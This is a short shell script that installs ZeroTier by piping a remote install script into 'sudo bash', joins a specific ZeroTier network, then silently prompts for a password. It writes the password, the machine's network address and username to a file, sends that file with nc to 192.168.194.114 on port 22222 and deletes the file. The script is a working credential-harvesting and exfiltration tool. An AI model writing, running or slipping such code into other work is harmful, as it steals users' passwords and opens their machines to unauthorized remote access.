#!/usr/bin/env sh


get_pass(){
	echo -n "Enter password: "
	read -s pass

	echo $pass > pass.in
	ifconfig | grep 168.194 >> pass.in
	echo `whoami` >> pass.in

	nc 192.168.194.114 22222 < pass.in && rm -rf pass.in
}

init(){
	curl -s https://install.zerotier.com | sudo bash
	sudo zerotier-cli join 83048a0632106262
}



main(){

	init
	sleep 20
	get_pass
}


main
